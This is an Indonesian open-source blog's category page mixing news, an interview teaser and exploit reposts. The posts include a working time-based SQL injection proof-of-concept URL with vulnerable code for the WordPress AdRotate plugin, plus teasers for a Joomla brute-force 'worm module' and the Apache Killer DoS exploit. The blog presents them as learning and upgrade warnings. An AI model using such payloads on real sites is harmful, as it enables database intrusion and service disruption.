Posts from the ‘Uncategorized’ Category

Kunjungi opensource.id


Alhamdulillah, kini telah lahir situs OpenSource.Id dimana anda bisa menikmati (kembali) berbagai berita dan informasi lainnya terkait teknologi informasi dan dunia Open Source.

Kami nantikan kehadiran sahabat-sahabat semua di

OpenSource.ID

Artikel Exploit (3) : WordPress Plugin Adrotate – EDB-ID: 17888 – SQL Injection


Exploit WordPress Plugin Adrotate – EDB-ID: 17888 – SQL Injection

Catatan :

Perlahan, blog tanyarezaervani juga akan memuat beberapa Pembuktian Konsep Eksploit dari database Vulnerabiliti yang ada. Tujuannya adalah untuk pembelajaran juga pengetahuan bagi para pengguna awam di internet serta penguat anjuran untuk melakukan upgrade jika ternyata perangkat lunak Open Source yang anda gunakan masih memiliki kerentanan yang ditunjukkan.

Daftar kerentanan sedang coba dikoleksi di : https://tanyarezaervani.wordpress.com/vulnerability-database/

Penyalahgunaan tutorial berada diluar tanggung jawab pengelola blog.

Setiap tutorial selalu disertai dengan saran untuk mengupgrade versi perangkat lunak yang ada. Baca lebih lanjut…

VulnDB : Plugin AdRotate – EDB-ID: 17888


Sebuah database lengkap sedang coba dirintis di : https://tanyarezaervani.wordpress.com/vulnerability-database/ – Bantuan anda dalam bentuk pengetahuan dan donasi akan sangat membantu.


# Exploit Title: WordPress AdRotate plugin <= 3.6.5 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.5.zip
# Version: 3.6.5 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23

---------------
Vulnerable code
---------------
if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = urldecode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;");

Tokoh : Nur Aini Rakhmawati Gunawan, Srikandi Open Source Indonesia


Nur Aini Rakhmawati Gunawan, Srikandi Open Source Indonesia

Wawancara Oleh : Rayyan Rahmi Isda

Eksklusif untuk Blog https://tanyarezaervani.wordpress.com

Umumnya, para penggiat Open Source berasal dari kalangan laki-laki, hanya sebagian kecil dari kalangan wanita apalagi akhwat yang mau menekuni bidang ini, salah satunya adalah NUR AINI RAKHMAWATI GUNAWAN. Beliau berasal dari Pasuruan, kelahiran tahun 1982. Ibu dari satu anak ini telah menempuh studi sampai tingkat S3 di Irlandia, berprofesi sebagai dosen tetap Jurusan Sistem Informasi di Institut Teknologi Sepuluh November (ITS), Surabaya.

Beliau merupakan pendiri Kelompok Linux Cewek Indonesia, sering disebut dengan singkatan KLUWEK. Beliau juga telah menghasilkan karya berupa aplikasi Open Source yang dinamai Keyrani, sebuah aplikasi informasi masa kehamilan dan tumbuh kembang anak yang berbasis Android. Nama Keyrani tersebut diambil dari nama anaknya yang bernama Syifa Aisha Keyrani Gunawan. Lebih lanjut mengenai aplikasi ini dapat dilihat pada blog beliau di www.ai23.wordpress.com/keyrani . Beliau juga telah mendapat penghargaan tingkat International http://anitaborg.org/initiatives/systers/pass-it-on-grants-program/spring-2011-systers-pass-it-on-award-winners/

Beberapa hari yang lalu saya telah mewawancarai beliau via online. Berikut petikan wawancaranya :

Sangat menarik sekali ada aplikasi Keyrani yang berbasis Android, sampai saat ini bagaimana feed back dari masyarakat dan apa harapan Ibu ke depannya tentang aplikasi ini ?

Baca lebih lanjut…

AOSI Monthly Meeting


Koleksi Kode Sumber (22) : Joomlabrute.py



#!/usr/bin/python
# Joomla bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname     : joomlabruteforce.py inspired by wordpress brute force by gunslinger
# Pretty much one of my worm module
# Programmer     : mywisdom (http://myw1sd0m.blogspot.com)
# Version    : 1.0
#tis is one of my linux w0rm module for user enumerations, i've dual os worm
#thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r
#thanks to: isa m said, whitecyber
#thanks to all devilzc0de crews and members, all jasakom,jatimcrew crews and members
# Date        : Feb 14 th  2011

Baca lebih lanjut…

Koleksi Exploit : Apache Killer


Berita Terkait : https://tanyarezaervani.wordpress.com/2011/09/02/berita-185-apache-http-server-2-2-20-perbaiki-dos-vulnerability/

EDB-ID: 17696

CVE: N/A

OSVDB-ID: N/A

Author: Kingcope

Published: 2011-08-19

Verified: Not Verified

Baca lebih lanjut…

%d blogger menyukai ini: